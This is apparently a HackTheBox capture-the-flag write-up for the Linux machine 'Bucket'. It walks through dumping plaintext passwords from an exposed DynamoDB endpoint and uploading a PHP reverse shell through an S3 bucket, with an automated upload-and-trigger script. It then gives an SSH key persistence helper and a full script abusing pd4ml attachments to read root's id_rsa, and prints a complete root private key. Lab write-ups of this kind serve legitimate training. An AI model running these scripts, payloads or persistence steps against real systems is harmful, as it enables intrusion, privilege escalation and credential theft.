Introduction@Bucket:~$
| Column | Details |
|---|---|
| Name | Bucket |
| IP | 10.10.10.212 |
| Points | 30 |
| OS | Linux |
| Difficulty | Medium |
| Creator | MrR3boot |
| Out On | 17 Oct 2020 |
Summary
- Nmap shows two open ports.
- Enumerating the web server leads to a subdomain and a directory called /shell.
- Using the aws CLI we upload a PHP reverse shell into a bucket.
- The upload gets served by the web server and we get a shell.
- Grab user.txt.
- We find an internal service listening on port 4566 (and a web app on port 8000).
- Port forward it; the internal web app gives us file read (and code execution) as root.
- Create the alerts table.
- Insert the payload.
- Trigger the payload and create the PDF file.
- Get root's id_rsa out of the PDF and ssh in.
- Grab root.txt.
Pwned
Recon
Nmap
```text
┌─[root@d3dsec]─[~/Desktop/HTB/Bucket]
└──╼ #cat nmap/result.nmap
# Nmap 7.80 scan initiated Sun Sep 27 08:19:05 2020 as: nmap -sC -sV -oA /result 10.10.10.212
Nmap scan report for 10.10.10.212
Host is up (0.27s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://bucket.htb/
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.32 seconds
```
So two ports are open: 22 (ssh) and 80 (http).
The nmap result also gives us the domain bucket.htb, because port 80 redirects there. Let's first add it to our /etc/hosts file.
Port-80
There is a simple Bucket Advertising Platform.
Let's view the source code.
We see a new domain, s3.bucket.htb. Let's add it to the hosts file as well and go to that page.
It just says running.
Let's use Gobuster to find something new.
```text
┌─[root@d3dsec]─[~/Desktop/HTB/Bucket]
└──╼ #gobuster dir -u http://s3.bucket.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://s3.bucket.htb/
[+] Threads:        50
[+] Wordlist:       /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/29 17:47:50 Starting gobuster
===============================================================
/health (Status: 200)
/shell (Status: 200)
```
We find a /shell directory, which is something new. Let's check it out.
It's a DynamoDB Web Shell. We can run queries from that page too, but I prefer to run them from the CLI.
Let's configure our aws CLI.
But first install the aws CLI.
```bash
sudo apt-get install awscli
```
Now let's configure it for our use. The keys below are the placeholder values from the AWS documentation; the s3.bucket.htb endpoint accepts them, and the read-only queries below also work unsigned (--no-sign-request).
```text
aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json
```
Now our setup is complete. Let's list the tables in the DynamoDB database.
```bash
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request
```
There is only one table, users.
Let's dump its contents.
```bash
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request
```
```json
{
    "Items": [
        {
            "password": {
                "S": "Management@#1@#"
            },
            "username": {
                "S": "Mgmt"
            }
        },
        {
            "password": {
                "S": "Welcome123!"
            },
            "username": {
                "S": "Cloudadm"
            }
        },
        {
            "password": {
                "S": "n2vM-<_K_Q:.Aa2"
            },
            "username": {
                "S": "Sysadm"
            }
        }
    ],
    "Count": 3,
    "ScannedCount": 3,
    "ConsumedCapacity": null
}
```
We got some creds. I tried them over SSH, but none of them worked there.
We also have the web server on http://s3.bucket.htb that just says running. Let's enumerate it as an S3 endpoint and list the buckets.
```bash
aws s3 ls --endpoint-url http://s3.bucket.htb --no-sign-request
```
There is one bucket called adserver.
I think this bucket backs the http://bucket.htb page.
Let's list the contents of the adserver bucket.
```bash
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver
```
It dumps all the files in the adserver bucket.
Hmm.. Let's try to put a simple PHP reverse shell in there.
```bash
aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/shell.php
```
Let's list the files again to double-check that our reverse shell is now in the adserver bucket.
```bash
aws --endpoint-url http://s3.bucket.htb/ s3 ls --recursive --human-readable --summarize s3://adserver
```
Boom, our shell.php was successfully inserted inside the images directory.
Let's do a curl request to that path and see whether our reverse shell works.
Important: I used this method again later, so my shell name is shell1.php; in your case the shell name is shell.php.
Before running this command, start your netcat listener on the port you set in your reverse shell.
```bash
curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php
```
It says 404 not found.
Hmm, I think a cron job syncs the bucket into the web root (and cleans it up again), so we need to be quick to get a reverse shell.
I wrote a small loop to automate the curl requests. Note that resp has to be initialised: an unset variable compares as 0 inside [[ ]], so the loop would otherwise exit immediately.
```bash
# Poll the web root until the synced copy of the shell shows up (404 until then).
resp=404
while [[ $resp -eq 404 ]]; do
    resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null http://bucket.htb/images/shell1.php)
    echo "$resp"
    sleep 0.1
done
```
I repeated the same steps again, but I still didn't get the reverse shell.
Let's write a script that uploads the file and requests it automatically.
I wrote a script to automate the whole process.
```bash
#!/bin/bash
# Upload the reverse shell to the adserver bucket, then poll bucket.htb until the
# synced copy appears in the web root. The first 200 response executes the shell,
# so start the netcat listener before running this.
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
ENDPOINT=http://s3.bucket.htb/

echo "List files."
aws --endpoint-url "$ENDPOINT" s3 ls --recursive --human-readable --summarize s3://adserver

## Copy the shell into the bucket; abort if the upload fails
aws --endpoint-url "$ENDPOINT" s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/shell1.php || exit 1

echo "Check if file is uploaded"
aws --endpoint-url "$ENDPOINT" s3 ls --recursive --human-readable --summarize s3://adserver

# The S3 endpoint itself does not serve the object over plain HTTP (expect 404)
echo "Checking on s3.bucket"
curl --write-out "%{http_code}\n" --silent --output /dev/null http://s3.bucket.htb/adserver/images/shell1.php

# Poll the real web root; the sync window is short, so poll fast
resp=404
while [[ $resp -eq 404 ]]; do
    resp=$(curl --write-out "%{http_code}\n" --silent --output /dev/null http://bucket.htb/images/shell1.php)
    echo "$resp"
    sleep 0.1
done
```
I named the script dedsec.sh; name yours whatever you like.
Now the only work left is to start your listener and catch a sweet reverse shell.
Important: you may have to run this script two or three times before you get the reverse shell.
Boom, we got the reverse shell.
Let's check the /etc/passwd file to learn about the users on the machine.
There is one user named roy. Let's try the passwords we found in the DynamoDB users table.
Boom, we get user privileges as roy. Grab your user.txt.
Privilege escalation
Before we start the privilege escalation, let's do one thing: copy our SSH public key into roy's .ssh folder (authorized_keys) so we get an SSH connection, which is better than a netcat shell.
Now let's ssh in and enjoy a proper SSH connection.
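The key install is a common place to lose time, because sshd (with StrictModes, the default) silently ignores authorized_keys when the directory or file is writable by others. Below is an added helper, not from the original writeup, that does the copy with the right permissions and without duplicating an existing entry; the home directory and key string are parameters, and the key shown in the usage comment is a placeholder.

```bash
#!/bin/bash
# Added example: install a public key for the current user the way sshd expects.
#   $1 = home directory of the target user (e.g. "$HOME" when run as roy)
#   $2 = the public key line to add (placeholder in the usage note below)
install_authorized_key() {
    local home="$1" pubkey="$2"
    # ~/.ssh must be 700 and authorized_keys 600, or StrictModes rejects the key
    mkdir -p "$home/.ssh" && chmod 700 "$home/.ssh"
    touch "$home/.ssh/authorized_keys"
    # Append only if this exact line is not already present (idempotent)
    grep -qxF "$pubkey" "$home/.ssh/authorized_keys" \
        || printf '%s\n' "$pubkey" >> "$home/.ssh/authorized_keys"
    chmod 600 "$home/.ssh/authorized_keys"
}

# Usage from roy's netcat shell (key is a placeholder, paste your own):
#   install_authorized_key "$HOME" "ssh-ed25519 AAAAC3Nza... attacker@kali"
```

After this, `ssh roy@10.10.10.212` should log in without a password; if it still prompts, check `ls -la ~/.ssh` on the box for group or world write bits on the home directory itself.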
After some enumeration I found an interesting directory called bucket-app.
Let's cat its index.php and check what the file does.
index.php talks to the internal DynamoDB service: on a POST request it reads a table named alerts and turns the data values of its items into a PDF, using pd4ml.
Link: HTML to PDF converter for Java and .NET
pd4ml renders HTML, and its attachment tag lets the HTML embed a local file into the PDF (see the cookbook page under Resources). We will abuse this to get root's id_rsa file.
Step 1
First things first, we need to port forward port 8000. The aws CLI is installed on the box, and two internal services listen on localhost: port 8000 (the web app) and port 4566 (the AWS service).
```bash
ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212
```
Let's cross-check that the forward works: open your browser and go to 127.0.0.1:8000. If it shows the web app, the port is forwarded successfully.
Step 2
Create a new DynamoDB table named alerts, keyed on title.
Run this command on the machine (as roy), against the internal endpoint on port 4566.
```bash
/usr/bin/aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url http://127.0.0.1:4566
```
Step 3
Insert an item into the table with the values index.php expects: the title key it filters on, and a data value holding the HTML that pd4ml will render (the attachment tag pointing at root's id_rsa).
Step 4
Now we only need to send the POST request that triggers index.php.
```bash
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
```
Step 5
Now open your browser and go to 127.0.0.1:8000/files/
There is a result.pdf; open it.
Click on the pin (paperclip) icon and download root's id_rsa.
I prefer to download it from my terminal so the file stays organised in my Bucket directory. Then:
```bash
chmod 600 id_rsa
ssh -i id_rsa root@10.10.10.212
```
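Steps 1 to 5 above, as one script run from the attacker box. This is an added example, not code from the original writeup: it forwards port 4566 as well as 8000 so the create-table and put-item calls can be made locally instead of on the box, and it uses the aws CLI credentials configured earlier. Assumptions, labelled in the comments: the table key is title (from the create-table command above), the HTML lives in a data attribute, the title value must equal whatever index.php's scan filters on (read it from index.php and pass it as the first argument), the description text is arbitrary, and the attachment tag follows the pd4ml cookbook page linked under Resources.

```bash
#!/bin/bash
# Added example: alerts-table abuse end to end over SSH port forwards.
set -u

TARGET=10.10.10.212
DDB=http://127.0.0.1:4566   # internal DynamoDB, reached through ssh -L
WEB=http://127.0.0.1:8000   # internal bucket-app, reached through ssh -L

# Build the put-item JSON. pd4ml embeds the file named in src="file://..." as a
# PDF attachment when it renders this HTML (tag syntax per the pd4ml cookbook).
# The inner double quotes are escaped because the value is a JSON string.
build_alert_item() {
    local title="$1" path="$2"
    printf '{"title": {"S": "%s"}, "data": {"S": "<pd4ml:attachment src=\\"file://%s\\" description=\\"root key\\" icon=\\"Paperclip\\"/>"}}' \
        "$title" "$path"
}

run_exploit() {
    local title="$1" path="${2:-/root/.ssh/id_rsa}"

    # 1. Forward both internal ports in one background session (-f -N).
    ssh -f -N -L 8000:127.0.0.1:8000 -L 4566:127.0.0.1:4566 roy@"$TARGET"

    # 2. Create the alerts table index.php expects (same command the writeup runs on the box).
    aws dynamodb create-table --table-name alerts \
        --attribute-definitions AttributeName=title,AttributeType=S \
        --key-schema AttributeName=title,KeyType=HASH \
        --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 \
        --endpoint-url "$DDB"

    # 3. Insert the item whose data attribute carries the attachment tag.
    aws dynamodb put-item --table-name alerts \
        --item "$(build_alert_item "$title" "$path")" \
        --endpoint-url "$DDB"

    # 4. Trigger index.php; it renders the data value to files/result.pdf.
    curl -s -X POST -d "action=get_alerts" "$WEB/" -o /dev/null

    # 5. Fetch the PDF; the key is inside it as an attachment.
    curl -s "$WEB/files/result.pdf" -o result.pdf
}

# Run only when asked, so the file can also be sourced for build_alert_item.
# Usage: BUCKET_RUN=1 ./privesc.sh '<title index.php filters on>' [/path/to/read]
if [ -n "${BUCKET_RUN:-}" ]; then
    run_exploit "${1:?title index.php filters on}" "${2:-}"
fi
```

The path argument is not limited to id_rsa: any file readable by the user running pd4ml can be pulled the same way, which is exactly why letting a root-run renderer process attacker-controlled HTML is the bug here.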
I'll also include root's id_rsa here as a backup plan.
```text
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
```
Now the only thing missing is root.txt. Let's grab it.
And we pwned it.
If you liked the writeup, support a student in getting the OSCP cert:
Donation for OSCP
Resources
| Topic | Url |
|---|---|
| HTML to PDF converter for Java and .NET | https://pd4ml.com/cookbook/pdf-attachments.htm |